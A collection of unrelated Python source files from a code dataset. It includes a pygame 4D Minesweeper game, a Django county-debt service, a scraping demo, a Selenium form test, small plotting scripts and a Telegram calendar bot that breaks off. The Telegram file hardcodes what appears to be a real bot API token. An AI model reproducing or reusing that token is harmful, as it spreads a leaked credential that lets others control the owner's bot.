return None\r\n\r\nclass MS_Model(Model):\r\n def __init__(self):\r\n self.length=4\r\n l=self.length\r\n \r\n self.arr_neighbor\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n \r\n self.arr_bomb\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n\r\n self.arr_flag\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n\r\n self.arr_digged\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n\r\n self.sum_bombs=0\r\n self.sum_flags=0\r\n self.rest_bombs=0\r\n self.rest_flags=0\r\n self.sum_digged=0\r\n \r\n def clear_arrays(self):\r\n l=self.length\r\n self.arr_neighbor\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n \r\n self.arr_bomb\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n\r\n self.arr_flag\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n\r\n self.arr_digged\\\r\n =[[[[0 for a in range(l)] for b in range(l)]\r\n for c in range(l)] for d in range(l)]\r\n \r\n def set_sum_rest(self,num):\r\n self.sum_bombs=num\r\n self.sum_flags=num\r\n self.rest_bombs=num\r\n self.rest_flags=num\r\n \r\n def put_bombs(self):\r\n for a in range(self.sum_bombs):\r\n while True:\r\n v=random.randint(0,self.length-1)\r\n w=random.randint(0,self.length-1)\r\n x=random.randint(0,self.length-1)\r\n y=random.randint(0,self.length-1)\r\n if self.arr_bomb[v][w][x][y]==0:\r\n self.arr_bomb[v][w][x][y]=1\r\n break\r\n \r\n def count_neighbor(self):\r\n for v in range(self.length):\r\n for w in range(self.length):\r\n for x in range(self.length):\r\n for y in range(self.length):\r\n if self.arr_bomb[v][w][x][y]==1:\r\n for dv in range(-1,2):\r\n for dw in range(-1,2):\r\n for dx in range(-1,2):\r\n for dy in range(-1,2):\r\n bv=(v+dv>=0 and v+dv<=self.length-1)\r\n bw=(w+dw>=0 and w+dw<=self.length-1)\r\n bx=(x+dx>=0 and x+dx<=self.length-1)\r\n by=(y+dy>=0 and y+dy<=self.length-1)\r\n if bv and bw and bx and by:\r\n self.arr_neighbor[v+dv][w+dw][x+dx][y+dy]+=1\r\n \r\n def moredig(self,metay,metax,y,x):\r\n if self.arr_flag[metay][metax][y][x]==1:\r\n return None\r\n if self.arr_digged[metay][metax][y][x]==0:\r\n self.arr_digged[metay][metax][y][x]=1\r\n self.sum_digged+=1\r\n if self.arr_neighbor[metay][metax][y][x]>0:\r\n return None\r\n for dmy in range(-1,2):\r\n for dmx in range(-1,2):\r\n for dy in range(-1,2):\r\n for dx in range(-1,2):\r\n if dmy==0 and dmx==0 and y==0 and x==0:\r\n p=None\r\n else:\r\n bmy=(metay+dmy>=0 and metay+dmy<=self.length-1)\r\n bmx=(metax+dmx>=0 and metax+dmx<=self.length-1)\r\n by=(y+dy>=0 and y+dy<=self.length-1)\r\n bx=(x+dx>=0 and x+dx<=self.length-1)\r\n if bmy and bmx and by and bx:\r\n if self.arr_digged[metay+dmy][metax+dmx][y+dy][x+dx]==0:\r\n p=self.moredig(metay+dmy,metax+dmx,y+dy,x+dx)\r\n return None\r\n \r\n def end_digged_bomb(self):\r\n for a in range(self.length):\r\n for b in range(self.length):\r\n for c in range(self.length):\r\n for d in range(self.length):\r\n if self.arr_bomb[a][b][c][d]==1 and self.arr_digged[a][b][c][d]==1:\r\n self.arr_bomb[a][b][c][d]=0\r\n\r\n def dig_all_bomb(self):\r\n for a in range(self.length):\r\n for b in range(self.length):\r\n for c in range(self.length):\r\n for d in range(self.length):\r\n if self.arr_bomb[a][b][c][d]==1:\r\n self.arr_digged[a][b][c][d]=1\r\n\r\nclass V_Click_To_Start(View):\r\n def 
__init__(self,parent,model):\r\n self.parent=parent\r\n self.model=model\r\n self.fontlis=[]\r\n fn=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',30)\r\n self.fontlis.append(fn.render('四次元マインスイーパー',False,(255,200,0)))\r\n self.fontlis.append(fn.render('左クリックで開始',False,(255,200,0)))\r\n self.img_bg=pygame.image\\\r\n .load('datafile_4dms\\\\titlebg.png')\r\n\r\n def act(self,receive):\r\n if receive=='click_left':\r\n return 'start'\r\n else:\r\n return 'not_det'\r\n \r\n def show(self):\r\n screen.blit(self.img_bg,(0,0))\r\n screen.blit(self.fontlis[0],(150,210))\r\n screen.blit(self.fontlis[1],(180,250))\r\n\r\nclass S_Click_To_Start(Linked_State):\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n self.linklis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=V_Click_To_Start(self,self.model)\r\n\r\n def act(self,receive):\r\n s=self.view.act(receive)\r\n if s=='start':\r\n self.move(0)\r\n \r\n def show(self):\r\n self.view.show()\r\n\r\nclass S_Setup_BF(Linked_State):\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n self.linklis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=None\r\n\r\n def act(self,receive):\r\n self.model.clear_arrays()\r\n self.model.set_sum_rest(random.randint(4,8))\r\n self.model.put_bombs()\r\n self.model.count_neighbor()\r\n self.model.sum_digged=0\r\n self.move(0)\r\n \r\n def show(self):\r\n return None\r\n\r\nclass V_PlayMain(View):\r\n def __init__(self,parent,model):\r\n self.parent=parent\r\n self.model=model\r\n self.masu=26\r\n self.dx=200\r\n self.dy=10\r\n self.metay=0\r\n self.metax=0\r\n self.y=0\r\n self.x=0\r\n self.img_bomb=pygame.image\\\r\n .load('datafile_4dms\\\\bomb.png')\r\n self.img_fire=pygame.image\\\r\n .load('datafile_4dms\\\\fire.png')\r\n self.img_flag=pygame.image\\\r\n .load('datafile_4dms\\\\flag.png')\r\n self.img_bomb=pygame.transform.scale(self.img_bomb,(self.masu,self.masu))\r\n self.img_fire=pygame.transform.scale(self.img_fire,(self.masu,self.masu))\r\n self.img_flag=pygame.transform.scale(self.img_flag,(self.masu,self.masu))\r\n\r\n self.fontsty=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',22)\r\n self.font=(self.fontsty.render('0',False,(0,0,0)))\r\n self.fontlis=[]\r\n self.fontlis.append(self.fontsty.render(\r\n '爆弾の総数:{}個'.format(0),False,(200,200,200)))\r\n self.fontlis.append(self.fontsty.render(\r\n '立てた旗:{}本'.format(0),False,(200,200,200)))\r\n self.fontlis.append(self.fontsty.render(\r\n '残りの旗:{}本'.format(0),False,(200,200,200)))\r\n \r\n def in_field(self,px,py):\r\n ppx=px-self.dx\r\n ppy=py-self.dy\r\n if ppx>=0 and ppx<=self.masu*self.model.length*self.model.length\\\r\n and ppy>=0 and ppy<=self.masu*self.model.length*self.model.length:\r\n return True\r\n else:\r\n return False\r\n \r\n def get_arrpos(self,px,py):\r\n ppx=px-self.dx\r\n ppy=py-self.dy\r\n metax=0\r\n metay=0\r\n x=0\r\n y=0\r\n for a in range(self.model.length):\r\n if a*self.model.length*self.masu<=ppx and ppx<(a+1)*self.model.length*self.masu:\r\n metax=a\r\n ppx+=(-1)*a*self.model.length*self.masu\r\n break\r\n for a in range(self.model.length):\r\n if a*self.model.length*self.masu<=ppy and ppy<(a+1)*self.model.length*self.masu:\r\n metay=a\r\n ppy+=(-1)*a*self.model.length*self.masu\r\n break\r\n for a in range(self.model.length):\r\n if a*self.masu<=ppx and ppx<(a+1)*self.masu:\r\n x=a\r\n break\r\n for a in range(self.model.length):\r\n if a*self.masu<=ppy and ppy<(a+1)*self.masu:\r\n y=a\r\n break\r\n return [metay,metax,y,x]\r\n \r\n def 
get_savedpos(self):\r\n return [self.metay,self.metax,self.y,self.x]\r\n \r\n def draw_grid(self):\r\n l=self.model.length\r\n for a in range(l*l+1):\r\n pygame.draw.line(screen,(150,150,150),(a*self.masu+self.dx,self.dy)\r\n ,(a*self.masu+self.dx,l*l*self.masu+self.dy),1)\r\n pygame.draw.line(screen,(150,150,150),(self.dx,a*self.masu+self.dy)\r\n ,(l*l*self.masu+self.dx,a*self.masu+self.dy),1)\r\n\r\n for a in range(self.model.length+1):\r\n pygame.draw.line(screen,(150,150,150),(a*l*self.masu+self.dx,self.dy)\r\n ,(a*l*self.masu+self.dx,l*l*self.masu+self.dy),3)\r\n pygame.draw.line(screen,(150,150,150),(self.dx,a*l*self.masu+self.dy)\r\n ,(l*l*self.masu+self.dx,a*l*self.masu+self.dy),3)\r\n \r\n def draw_tile(self):\r\n l=self.model.length\r\n for my in range(l):\r\n for mx in range(l):\r\n for y in range(l):\r\n for x in range(l):\r\n r=pygame.Rect(self.dx+(l*mx+x)*self.masu,\r\n self.dy+(l*my+y)*self.masu,self.masu,self.masu)\r\n if self.model.arr_digged[my][mx][y][x]==0:\r\n if self.model.arr_flag[my][mx][y][x]==1:\r\n pygame.draw.rect(screen,(200,200,200),r)\r\n screen.blit(self.img_flag,\r\n (self.dx+(l*mx+x)*self.masu,\r\n self.dy+(l*my+y)*self.masu))\r\n else:\r\n pygame.draw.rect(screen,(70,70,70),r)\r\n else:\r\n if self.model.arr_bomb[my][mx][y][x]==1:\r\n pygame.draw.rect(screen,(250,240,0),r)\r\n screen.blit(self.img_bomb,\r\n (self.dx+(l*mx+x)*self.masu,\r\n self.dy+(l*my+y)*self.masu))\r\n else:\r\n pygame.draw.rect(screen,(0,0,0),r)\r\n num_bom=self.model.arr_neighbor[my][mx][y][x]\r\n if num_bom>0:\r\n self.font=(self.fontsty.render(str(num_bom)\r\n ,False,(250,50,0)))\r\n screen.blit(self.font,\r\n (self.dx+(l*mx+x)*self.masu+3,\r\n self.dy+(l*my+y)*self.masu+1))\r\n\r\n def draw_property(self):\r\n self.fontlis[0]=self.fontsty.render(\r\n '爆弾の総数:{}個'.format(self.model.sum_bombs),\r\n False,(200,200,200))\r\n self.fontlis[1]=self.fontsty.render(\r\n '立てた旗:{}本'.format(self.model.sum_flags-self.model.rest_flags),\r\n False,(200,200,200))\r\n self.fontlis[2]=self.fontsty.render(\r\n '残りの旗:{}本'.format(self.model.rest_flags),\r\n False,(200,200,200))\r\n screen.blit(self.fontlis[0],(10,10))\r\n screen.blit(self.fontlis[1],(10,40))\r\n screen.blit(self.fontlis[2],(10,70))\r\n\r\n def act(self,receive):\r\n if receive=='click_left' or receive=='click_right':\r\n if receive=='click_left':\r\n receive='cl_in_field'\r\n elif receive=='click_right':\r\n receive='cr_in_field'\r\n p=self.parent.parent.get_mpos()\r\n px=p[0]\r\n py=p[1]\r\n if self.in_field(px,py)==True:\r\n s=self.get_arrpos(px,py)\r\n self.metay=s[0]\r\n self.metax=s[1]\r\n self.y=s[2]\r\n self.x=s[3]\r\n return receive\r\n else:\r\n return 'not_det'\r\n else:\r\n return 'not_det'\r\n \r\n def show(self):\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_grid()\r\n self.draw_property()\r\n\r\nclass S_PlayMain(Linked_State):\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n #0:gameover, 1:gameclear \r\n self.linklis=[]\r\n self.sublis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=V_PlayMain(self,model)\r\n\r\n def act(self,receive):\r\n s=self.view.act(receive)\r\n if s=='cl_in_field':\r\n t=self.view.get_savedpos()\r\n dst=self.model.arr_digged[t[0]][t[1]][t[2]][t[3]]\r\n est=self.model.arr_flag[t[0]][t[1]][t[2]][t[3]]\r\n if dst==0 and est==0:\r\n self.model.moredig(t[0],t[1],t[2],t[3])\r\n if self.model.arr_bomb[t[0]][t[1]][t[2]][t[3]]==1:\r\n self.move(0)\r\n else:\r\n if self.model.sum_digged>=(self.model.length**4)-self.model.sum_bombs:\r\n self.move(1)\r\n elif 
s=='cr_in_field':\r\n t=self.view.get_savedpos()\r\n dst=self.model.arr_flag[t[0]][t[1]][t[2]][t[3]]\r\n if dst==0 and self.model.rest_flags>0:\r\n self.model.arr_flag[t[0]][t[1]][t[2]][t[3]]=1\r\n self.model.rest_flags+=-1\r\n elif dst==1:\r\n self.model.arr_flag[t[0]][t[1]][t[2]][t[3]]=0\r\n self.model.rest_flags+=1\r\n \r\n def show(self):\r\n self.view.show()\r\n\r\nclass V_Gameover(V_PlayMain):\r\n def __init__(self,parent,model):\r\n self.parent=parent\r\n self.model=model\r\n self.masu=26\r\n self.dx=200\r\n self.dy=10\r\n self.counter=0\r\n\r\n self.fontsty=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',22)\r\n self.font=(self.fontsty.render('0',False,(0,0,0)))\r\n self.fontlis=[]\r\n self.fontsty2=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',30)\r\n self.fontlis.append(self.fontsty2.render('ゲームオーバー',False,(0,0,0)))\r\n self.fontlis.append(self.fontsty2.render('左クリックで再挑戦',False,(0,0,0)))\r\n\r\n self.img_bomb=pygame.image\\\r\n .load('datafile_4dms\\\\bomb.png')\r\n self.img_fire=pygame.image\\\r\n .load('datafile_4dms\\\\fire.png')\r\n self.img_flag=pygame.image\\\r\n .load('datafile_4dms\\\\flag.png')\r\n self.img_bomb=pygame.transform.scale(self.img_bomb,(self.masu,self.masu))\r\n self.img_fire=pygame.transform.scale(self.img_fire,(self.masu,self.masu))\r\n self.img_flag=pygame.transform.scale(self.img_flag,(self.masu,self.masu))\r\n\r\n self.img_gov=pygame.image\\\r\n .load('datafile_4dms\\\\gov.png')\r\n\r\n def act(self,receive):\r\n if self.counter<10:\r\n self.counter+=1\r\n return 'not_det'\r\n elif self.counter>=10 and self.counter<20:\r\n if self.counter==10:\r\n s='unit_fire'\r\n else:\r\n s='not_det'\r\n self.counter+=1\r\n return s\r\n elif self.counter>=20 and self.counter<30:\r\n if self.counter==20:\r\n s='bomb_leak'\r\n else:\r\n s='not_det'\r\n self.counter+=1\r\n return s\r\n elif self.counter>=30 and self.counter<40:\r\n if self.counter==30:\r\n s='all_fire'\r\n else:\r\n s='not_det'\r\n self.counter+=1\r\n return s\r\n else:\r\n if receive=='click_left':\r\n self.counter=0\r\n return 'retry'\r\n \r\n def draw_unit_fire(self):\r\n l=self.model.length\r\n for my in range(l):\r\n for mx in range(l):\r\n for y in range(l):\r\n for x in range(l):\r\n r=pygame.Rect(self.dx+(l*mx+x)*self.masu,\r\n self.dy+(l*my+y)*self.masu,self.masu,self.masu)\r\n if self.model.arr_digged[my][mx][y][x]==1:\r\n if self.model.arr_bomb[my][mx][y][x]==1:\r\n pygame.draw.rect(screen,(250,240,0),r)\r\n screen.blit(self.img_fire,\r\n (self.dx+(l*mx+x)*self.masu,\r\n self.dy+(l*my+y)*self.masu))\r\n \r\n def show(self):\r\n if self.counter<10:\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_grid()\r\n elif self.counter>=10 and self.counter<20:\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_unit_fire()\r\n self.draw_grid()\r\n elif self.counter>=20 and self.counter<30:\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_grid()\r\n elif self.counter>=30 and self.counter<40:\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_unit_fire()\r\n self.draw_grid()\r\n else:\r\n screen.blit(self.img_gov,(0,0))\r\n screen.blit(self.fontlis[0],(200,210))\r\n screen.blit(self.fontlis[1],(180,260))\r\n\r\nclass S_Gameover(Linked_State):\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n self.linklis=[]\r\n self.sublis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=V_Gameover(self,self.model)\r\n \r\n def act(self,receive):\r\n s=self.view.act(receive)\r\n if s=='bomb_leak':\r\n self.model.end_digged_bomb()\r\n 
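# Reveal sequence: first drop the mines the player already set off from
# the board, then flip every remaining mine face-up in one sweep.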
self.model.dig_all_bomb()\r\n if s=='retry':\r\n self.move(0)\r\n \r\n def show(self):\r\n self.view.show()\r\n\r\nclass V_Gameclear(V_PlayMain):\r\n def __init__(self,parent,model):\r\n self.parent=parent\r\n self.model=model\r\n self.masu=26\r\n self.dx=200\r\n self.dy=10\r\n self.counter=0\r\n\r\n self.fontsty=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',22)\r\n self.font=(self.fontsty.render('0',False,(0,0,0)))\r\n self.fontlis=[]\r\n self.fontsty2=pygame.font.SysFont('hg創英角ゴシックubhgp創英角ゴシックubhgs創英角ゴシックub',30)\r\n self.fontlis.append(self.fontsty2.render('ゲームクリア',False,(255,200,0)))\r\n self.fontlis.append(self.fontsty2.render('左クリックで再挑戦',False,(255,200,0)))\r\n\r\n self.img_bomb=pygame.image\\\r\n .load('datafile_4dms\\\\bomb.png')\r\n self.img_fire=pygame.image\\\r\n .load('datafile_4dms\\\\fire.png')\r\n self.img_flag=pygame.image\\\r\n .load('datafile_4dms\\\\flag.png')\r\n self.img_bomb=pygame.transform.scale(self.img_bomb,(self.masu,self.masu))\r\n self.img_fire=pygame.transform.scale(self.img_fire,(self.masu,self.masu))\r\n self.img_flag=pygame.transform.scale(self.img_flag,(self.masu,self.masu))\r\n\r\n self.img_bg=pygame.image\\\r\n .load('datafile_4dms\\\\titlebg.png')\r\n \r\n def act(self,receive):\r\n if self.counter<10:\r\n self.counter+=1\r\n return 'not_det'\r\n else:\r\n if receive=='click_left':\r\n self.counter=0\r\n return 'retry'\r\n \r\n def show(self):\r\n if self.counter<10:\r\n screen.fill((0,0,0))\r\n self.draw_tile()\r\n self.draw_grid()\r\n else:\r\n screen.blit(self.img_bg,(0,0))\r\n screen.blit(self.fontlis[0],(200,210))\r\n screen.blit(self.fontlis[1],(180,260))\r\n\r\nclass S_Gameclear(Linked_State):\r\n def __init__(self,parent,model):\r\n self.focused=False\r\n self.linklis=[]\r\n self.sublis=[]\r\n self.parent=parent\r\n self.model=model\r\n self.view=V_Gameclear(self,self.model)\r\n \r\n def act(self,receive):\r\n s=self.view.act(receive)\r\n if s=='retry':\r\n self.move(0)\r\n \r\n def show(self):\r\n self.view.show()\r\n\r\nmodel=MS_Model()\r\nstatemachine=StateMachine(model)\r\nscts=S_Click_To_Start(statemachine,model)\r\nstatemachine.add_state(scts)\r\nssbn=S_Setup_BF(statemachine,model)\r\nstatemachine.add_state(ssbn)\r\nscts.add_link(ssbn)\r\nsplm=S_PlayMain(statemachine,model)\r\nstatemachine.add_state(splm)\r\nssbn.add_link(splm)\r\nsgov=S_Gameover(statemachine,model)\r\nstatemachine.add_state(sgov)\r\nsplm.add_link(sgov)\r\nsgcl=S_Gameclear(statemachine,model)\r\nstatemachine.add_state(sgcl)\r\nsplm.add_link(sgcl)\r\n\r\nsgov.add_link(ssbn)\r\nsgcl.add_link(ssbn)\r\n\r\nstatemachine.statelis[0].focus()\r\n\r\np=False\r\nwhile(p==False):\r\n clock.tick(20)\r\n screen.fill((200,200,200))\r\n statemachine.act()\r\n statemachine.show()\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n print('unko')\r\n pygame.quit()\r\n sys.exit()","sub_path":"4Dminesweeper.py","file_name":"4Dminesweeper.py","file_ext":"py","file_size_in_byte":25845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32470430","text":"from debt_context.services.context_base import ContextBase\nfrom debt_context.models import CountyDebt\n\n\nclass CountyContextService(ContextBase):\n def __init__(self, county):\n self.county = county\n\n def context_population(self):\n output = []\n population = self.county.population\n\n if population == None:\n return [self.county]\n\n output = output + list(CountyDebt.objects.filter(population__gt=population).\\\n 
order_by('population')[:2])\n\n output.append(self.county)\n output = output + list(CountyDebt.objects.filter(population__lt=population).\\\n order_by('-population')[:2])\n\n return output\n\n def context_tax_debt_per_capita(self):\n output = []\n tax_debt_per_capita = self.county.tax_debt_per_capita\n\n if tax_debt_per_capita == None:\n return [self.county]\n\n output = output + list(CountyDebt.objects.filter(tax_debt_per_capita__gt=tax_debt_per_capita).\\\n order_by('tax_debt_per_capita')[:2])\n\n output.append(self.county)\n output = output + list(CountyDebt.objects.filter(tax_debt_per_capita__lt=tax_debt_per_capita).\\\n order_by('-tax_debt_per_capita')[:2])\n\n return output\n\n def context_assessed_valuation(self):\n output = []\n tax_year_valuation = self.county.tax_year_valuation\n if tax_year_valuation == None:\n return [self.county]\n\n output = output + list(CountyDebt.objects.filter(tax_year_valuation__gt=tax_year_valuation).\\\n order_by('tax_year_valuation')[:2])\n\n output.append(self.county)\n output = output + list(CountyDebt.objects.filter(tax_year_valuation__lt=tax_year_valuation).\\\n order_by('-tax_year_valuation')[:2])\n\n return output\n","sub_path":"debt_context/services/county_context_service.py","file_name":"county_context_service.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"174357950","text":"import sys\nfrom os.path import dirname, realpath\nsys.path.append(dirname(dirname(realpath(__file__))))\n\nfrom crawler.settings import *\n\nimport urllib2\nfrom bs4 import BeautifulSoup\nfrom readability.readability import Document\nfrom crawler.html_improver import HtmlImprover\n#from crawler.utils import gen_url_domain\n\n\ndef gen_url_domain(url):\n domain = url.replace('https://', '').replace('http://', '').split('/')[0]\n return domain\n\nif __name__ == '__main__':\n url = sys.argv[1]\n req_header = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept':'text/html;q=0.9,*/*;q=0.8',\n 'Accept-Charset':'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding':None,\n 'Connection':'close',\n 'Referer':None\n }\n req_timeout = 20\n req = urllib2.Request(url,None,req_header)\n ready = ''\n try:\n resp = urllib2.urlopen(req,None,req_timeout)\n ready = resp.read()\n except:\n pass\n \n soup = BeautifulSoup(ready,'lxml')\n \n try:\n doc = Document(ready)\n html = doc.summary()\n title = doc.short_title()\n except:\n pass\n \n fout = open('aaa','w')\n #print >> fout, soup.select('[itemprop=\"articleBody\"]')[0]\n #print >> fout, '---------------------------------------'\n html = html.encode('ascii', 'ignore')\n html = html.replace('\\r','')\n html = html.replace('\\n','')\n html = html.replace('\\s','')\n core_soup = BeautifulSoup(html, 'lxml')\n print >> fout, core_soup\n print >> fout, '++++++++++++++++++++++++++++'\n core_content = ''.join(core_soup.stripped_strings)\n title = soup.head.find_all('title')\n \n domain = gen_url_domain(url)\n new_title, img_src, core_soup = HtmlImprover(domain, soup, core_soup).get_ans()\n \n print >> fout, core_soup\n print >> fout, new_title\n print >> fout, img_src\n fout.close()\n '''\n divs = soup.find_all('div')\n for div in divs:\n if 'class' in div.attrs:\n if 'big_center_img' in div['class']:\n print div['data-gal-src']\n imgs = soup.find_all('img')\n for img in imgs:\n if '.jpg' in img['src'] and img['alt'] == '':\n print img['src']\n 
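# Dead code kept for reference: these loops pull gallery image URLs out of
# raw div/img attributes, a case the HtmlImprover pass above is meant to cover.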
'''\n","sub_path":"chaos/scripts/demo_test.py","file_name":"demo_test.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"6677270","text":"## Task 4: automating charterbooker\n# * Test that the multi-page form works.\n# * Check the response to a correct submission: \"Your message was sent successfully. Thanks! We'll be in touch as soon as we can, which is usually like lightning (Unless we're sailing or eating tacos!).\"\n# * Write a test case for e-mail address validation.\n\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support.ui import Select\nimport time\n\noptions = Options()\n# options.add_argument('--headless')\noptions.add_argument('--disable-gpu')\ndriver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)\n\ntry:\n driver.get(\"https://witty-hill-0acfceb03.azurestaticapps.net/charterbooker.html\")\n time.sleep(2)\n\n # Locators:\n # 1. page\n select1 = Select(driver.find_element_by_xpath('//*[@id=\"step1\"]/ul/li[1]/select'))\n next_btn1 = driver.find_element_by_xpath('//*[@id=\"step1\"]/ul/li[2]/button')\n # 2. page\n datapicker = driver.find_element_by_xpath('//*[@id=\"step2\"]/ul/li[1]/input')\n select2 = Select(driver.find_element_by_xpath('//*[@id=\"step2\"]/ul/li[2]/select'))\n select3 = Select(driver.find_element_by_xpath('//*[@id=\"step2\"]/ul/li[3]/select'))\n next_btn2 = driver.find_element_by_xpath('//*[@id=\"step2\"]/ul/li[4]/button')\n # 3. page\n fullname = driver.find_element_by_xpath('//*[@id=\"step3\"]/ul/li[1]/input')\n email = driver.find_element_by_xpath('//*[@id=\"step3\"]/ul/li[2]/input')\n msg = driver.find_element_by_xpath('//*[@id=\"step3\"]/ul/li[3]/textarea')\n request_btn3 = driver.find_element_by_xpath('//*[@id=\"step3\"]/ul/li[4]/button')\n\n # Test the full form\n # 1. page\n select1.select_by_value('1')\n next_btn1.click()\n time.sleep(2)\n # 2. page\n datapicker.send_keys('2010')\n select2.select_by_value('Morning')\n select3.select_by_value('3')\n time.sleep(1)\n next_btn2.click()\n time.sleep(2)\n # 3. page\n fullname.send_keys('John Smith')\n email.send_keys('johnsmith@gmail.com')\n msg.send_keys('-')\n request_btn3.click()\n time.sleep(3)\n\n # Check the alert text:\n alert = driver.find_element_by_xpath('//*[@id=\"booking-form\"]/h2')\n assert alert.text == \"Your message was sent successfully. Thanks! We'll be in touch as soon as we can, which is usually like lightning (Unless we're sailing or eating tacos!).\"\n\n # Check valid email address\n driver.get(\"https://witty-hill-0acfceb03.azurestaticapps.net/charterbooker.html\")\n time.sleep(3)\n\n # 1. page\n select1.select_by_value('2')\n next_btn1.click()\n time.sleep(2)\n # 2. page\n datapicker.send_keys('2010')\n select2.select_by_value('Morning')\n select3.select_by_value('3')\n time.sleep(1)\n next_btn2.click()\n time.sleep(2)\n # 3. 
page\n fullname.send_keys('John Smith')\n email.send_keys('johnsmith@')\n msg.send_keys('-')\n request_btn3.click()\n time.sleep(3)\n\n assert driver.find_element_by_id('bf_email-error').text == \"PLEASE ENTER A VALID EMAIL ADDRESS.\"\nfinally:\n pass\n # driver.close()\n","sub_path":"testproject/charterbooker.py","file_name":"charterbooker.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"410304393","text":"#!/usr/bin/env python\n# coding=utf-8\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('Agg')\n\nfrom matplotlib.pyplot import plot,savefig\ndef sin_x():\n x=np.linspace(-4,4,30)\n y=np.sin(x);\n\n plot(x,y,'--*b')\n\n savefig('static/sin.jpg')\n\ndef yx():\n x = [0, 1,2,3,4]\n y = [0, 1,2,3,4] # y = x\n\n plot(x, y)\n savefig(\"static/yx.jpeg\")\n\ndef x2():\n x2 = range(0,10)\n y2 = range(0,10) # y = x\n x1 = range(0, 10)\n y1 = [num**2 for num in x1] # y = x^2\n plot(x1, y1, x2, y2)\n savefig(\"static/x2.jpeg\")\n\nif __name__=='__main__':\n #draw()\n #sin_x()\n yx()\n x2()\n","sub_path":"agrith_util/plot/small_plot.py","file_name":"small_plot.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"361283273","text":"# -*- coding: iso-8859-1 -*-\n\nclass Asset:\n def __init__(self, Name, Value, Plan_Value, Anzahl, Categories):\n self.Name = Name\n self.Value = round(float(Value),2)\n self.Plan_Value = round(float(Plan_Value),2)\n self.Anzahl = Anzahl\n self.Categories = Categories\n\n","sub_path":"src/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"231612301","text":"def average():\n t = 0\n tot = 0\n while True:\n x = (input(\"Enter a number (q to stop)\"))\n if x == \"q\":\n return float(tot) / t\n else:\n t = 1 + t\n tot = int(x) + tot\n\n\n\n\ndef main():\n print(average())\n\nif __name__ == '__main__':\n main()\n","sub_path":"average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594687739","text":"from __future__ import print_function\r\n\r\nimport mapbox\r\nimport json\r\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\r\nimport datetime\r\nimport pickle\r\nimport os.path\r\nfrom googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nfrom google.auth.transport.requests import Request\r\nupdater = Updater(token='1134927516:AAE3Bi5dGXbaZWeO_IXIWZjtwMTpzsn6r64') # Токен API к Telegram\r\ndispatcher = updater.dispatcher\r\n# If modifying these scopes, delete the file token.pickle.\r\nSCOPES = ['https://www.googleapis.com/auth/calendar.readonly']\r\n\r\nclass Calendar:\r\n def __init__(self):\r\n self.service = None\r\n\r\n def startCommand(self, bot, update):\r\n bot.send_message(chat_id=update.message.chat_id, text=\"Hello! 
